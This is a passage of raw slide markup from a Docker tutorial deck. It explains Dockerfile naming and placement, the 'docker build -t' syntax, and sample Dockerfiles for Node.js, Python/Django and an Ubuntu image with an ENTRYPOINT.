              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>COPY . .</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2306">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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5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Dockerfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1554" name="Google Shape;1554;p2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2743" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2113"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There is no extension of a dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-362743" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2113"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There should be no space between Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-362743" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2113"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile should be present at the root level of your frontend/backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-362743" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2113"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always create Dockerfile near the package.json (root location)</a:t>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2112">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suntax</a:t>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="688"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1956">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker image build  -t account/ImageName:TagName dir</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1956">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="688"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1956">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1956">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="688"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1956">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1956">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ocker image build -t oklabs/aniluimage:v1 .</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1956">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2112">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="6292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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build Your Own Image/Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2290">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1560" name="Google Shape;1560;p251"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240250" y="119332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2340">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can build your own container/image using a “Dockerfile”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2340">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="317500" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="44897"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>docker image build  -t ImageName:TagName dir</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="44897"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="317500" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>docker build  -t ImageName:TagName dir</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>       docker build -t  myimage:1.0.0  .</a:t>
            </a:r>
            <a:endParaRPr sz="2450">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1561" name="Google Shape;1561;p251"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515125" y="56550"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2290">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker - File</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2290">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFil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pic>
        <p:nvPicPr>
          <p:cNvPr id="1566" name="Google Shape;1566;p252"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9116" l="4290" r="13357" t="12898"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600513" y="708550"/>
            <a:ext cx="6049724" cy="4146112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1567" name="Google Shape;1567;p252"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282675" y="110975"/>
            <a:ext cx="64401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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1568" name="Google Shape;1568;p252"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7332425" y="120051"/>
            <a:ext cx="1684999" cy="4803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2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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile Sample (NodeJS)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1574" name="Google Shape;1574;p2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lang="en" sz="2650"/>
              <a:t>FROM node</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650"/>
              <a:t>WORKDIR /var/www/rtc_app</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650"/>
              <a:t>COPY . .</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650"/>
              <a:t>RUN npm install</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650"/>
              <a:t>EXPOSE 5000</a:t>
            </a:r>
            <a:endParaRPr sz="2650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650"/>
              <a:t>CMD ["node","backend/server.js"]</a:t>
            </a:r>
            <a:endParaRPr sz="265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7"/>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2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Dockerfile Sample (Python)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1580" name="Google Shape;1580;p254"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="381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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>FROM python:latest</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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>WORKDIR /home</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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>COPY . .</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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>RUN python -m pip install -r requirements.txt</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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>EXPOSE 8000</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750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>RUN django-admin startproject anil .</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sz="1750">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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 sz="1750">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>CMD [ "python","manage.py","runserver","0.0.0.0:8000" ]</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>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2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How to build base OS image with entryfile</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1586" name="Google Shape;1586;p2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 sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENTRYPOINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exec top -b</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="CD5555"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="CD5555"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
